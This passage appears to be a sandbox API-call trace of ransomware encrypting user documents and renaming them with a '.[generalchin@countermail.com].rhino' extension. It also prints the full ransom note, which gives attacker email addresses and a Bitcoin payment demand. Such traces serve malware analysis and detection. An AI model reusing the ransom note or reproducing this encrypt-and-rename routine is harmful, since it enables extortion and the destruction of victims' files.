SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.476] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x164c5, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x164c5, lpOverlapped=0x0) returned 1 [0106.477] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba78 [0106.477] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.477] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba78 [0106.478] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba88 [0106.483] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x165e5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.483] CloseHandle (hObject=0x110) returned 1 [0106.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a31b8 [0106.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75a2c0 [0106.485] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0106.485] WriteFile (in: hFile=0x110, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0106.487] CloseHandle (hObject=0x110) returned 1 [0106.488] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2c0 | out: hHeap=0x6d0000) returned 1 [0106.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\J1KsjGDILiAYXKKh11.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\j1ksjgdiliayxkkh11.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.488] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x29be [0106.488] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2ade, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.488] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.488] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.490] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.490] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x29be, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x29be, lpOverlapped=0x0) returned 1 [0106.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba78 [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a28d8 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.491] GetLastError () returned 0x0 [0106.491] SetLastError (dwErrCode=0x0) [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a28d8 | out: hHeap=0x6d0000) returned 1 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e1) returned 0x23b2088 [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71b1c8 [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.491] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba78 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba88 [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72ba78 [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba88 | out: hHeap=0x6d0000) returned 1 [0106.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba88 [0106.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72ba78 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba88 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x71b840 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x71b828 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b840 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7ac308 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b828 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7296b0 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac308 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x7a28d8 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b02a0 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a28d8 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef778 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75a2c0 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef778 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x7af260 [0106.492] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2c0 | out: hHeap=0x6d0000) returned 1 [0106.492] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x7af340 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af260 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x729e60 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af340 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b4a78 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x729e60 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b4d48 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b4a78 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b5180 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b4d48 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b57c8 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5180 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b6130 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b57c8 | out: hHeap=0x6d0000) returned 1 [0106.493] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b4a78 [0106.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b6130 | out: hHeap=0x6d0000) returned 1 [0106.496] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b5fb8 [0106.497] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b4a78 | out: hHeap=0x6d0000) returned 1 [0106.497] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b7f80 [0106.497] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5fb8 | out: hHeap=0x6d0000) returned 1 [0106.497] WriteFile (in: hFile=0x110, lpBuffer=0x23b7fa0*, nNumberOfBytesToWrite=0x2ade, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23b7fa0*, lpNumberOfBytesWritten=0x292f304*=0x2ade, lpOverlapped=0x0) returned 1 [0106.497] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b7f80 | out: hHeap=0x6d0000) returned 1 [0106.497] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2ade, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.497] CloseHandle (hObject=0x110) returned 1 [0106.498] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9c08 [0106.499] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7af260 [0106.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9c08 | out: hHeap=0x6d0000) returned 1 [0106.499] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\J1KsjGDILiAYXKKh11.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\j1ksjgdiliayxkkh11.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\J1KsjGDILiAYXKKh11.ods.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\j1ksjgdiliayxkkh11.ods.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af260 | out: hHeap=0x6d0000) returned 1 [0106.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b1c8 | out: hHeap=0x6d0000) returned 1 [0106.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.499] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.499] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0106.499] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x75a2c0 [0106.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.500] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2c0 | out: hHeap=0x6d0000) returned 1 [0106.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\PIzt6Y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\pizt6y.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.500] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x9af8 [0106.500] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9c18, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.500] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.500] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.501] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.502] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x9af8, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x9af8, lpOverlapped=0x0) returned 1 [0106.502] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba78 [0106.502] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.502] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a28d8 [0106.502] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.502] GetLastError () returned 0x0 [0106.503] SetLastError (dwErrCode=0x0) [0106.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a28d8 | out: hHeap=0x6d0000) returned 1 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9b1b) returned 0x23b2088 [0106.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71b1c8 [0106.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.503] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba78 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba88 [0106.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72ba78 [0106.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba88 | out: hHeap=0x6d0000) returned 1 [0106.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba88 [0106.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72ba78 [0106.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba88 | out: hHeap=0x6d0000) returned 1 [0106.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x71b828 [0106.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba78 | out: hHeap=0x6d0000) returned 1 [0106.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757d78 [0106.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b828 | out: hHeap=0x6d0000) returned 1 [0106.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7ac508 [0106.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757d78 | out: hHeap=0x6d0000) returned 1 [0106.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x711898 [0106.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac508 | out: hHeap=0x6d0000) returned 1 [0106.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711ae0 [0106.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x6d0000) returned 1 [0106.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b09f0 [0106.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711ae0 | out: hHeap=0x6d0000) returned 1 [0106.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef8b0 [0106.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f0 | out: hHeap=0x6d0000) returned 1 [0106.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x712b08 [0106.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef8b0 | out: hHeap=0x6d0000) returned 1 [0106.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x712ba0 [0106.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712b08 | out: hHeap=0x6d0000) returned 1 [0106.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x712c80 [0106.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712ba0 | out: hHeap=0x6d0000) returned 1 [0106.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x712dc8 [0106.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712c80 | out: hHeap=0x6d0000) returned 1 [0106.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x712fb0 [0106.633] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712dc8 | out: hHeap=0x6d0000) returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x712b08 [0106.633] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712fb0 | out: hHeap=0x6d0000) returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x712f40 [0106.633] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712b08 | out: hHeap=0x6d0000) returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x713588 [0106.633] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712f40 | out: hHeap=0x6d0000) returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x713ef0 [0106.634] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713588 | out: hHeap=0x6d0000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x714d08 [0106.634] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713ef0 | out: hHeap=0x6d0000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x712b08 [0106.634] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714d08 | out: hHeap=0x6d0000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x714ad0 [0106.634] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712b08 | out: hHeap=0x6d0000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23d16b8 [0106.634] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714ad0 | out: hHeap=0x6d0000) returned 1 [0106.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x712b08 [0106.635] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23d16b8 | out: hHeap=0x6d0000) returned 1 [0106.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x23d16b8 [0106.635] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712b08 | out: hHeap=0x6d0000) returned 1 [0106.639] WriteFile (in: hFile=0x110, lpBuffer=0x23d16c0*, nNumberOfBytesToWrite=0x9c18, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23d16c0*, lpNumberOfBytesWritten=0x292f304*=0x9c18, lpOverlapped=0x0) returned 1 [0106.645] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23d16b8 | out: hHeap=0x6d0000) returned 1 [0106.646] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9c18, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.646] CloseHandle (hObject=0x110) returned 1 [0106.655] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3308 [0106.655] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712b08 [0106.655] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x6d0000) returned 1 [0106.655] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\PIzt6Y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\pizt6y.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\PIzt6Y.doc.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\pizt6y.doc.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712b08 | out: hHeap=0x6d0000) returned 1 [0106.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b1c8 | out: hHeap=0x6d0000) returned 1 [0106.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0106.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x71b1c8 [0106.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b1c8 | out: hHeap=0x6d0000) returned 1 [0106.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\PXapwoyUb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\pxapwoyub.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.659] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x8f12 [0106.659] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9032, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.659] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.659] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.661] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.661] ReadFile (in: hFile=0x110, 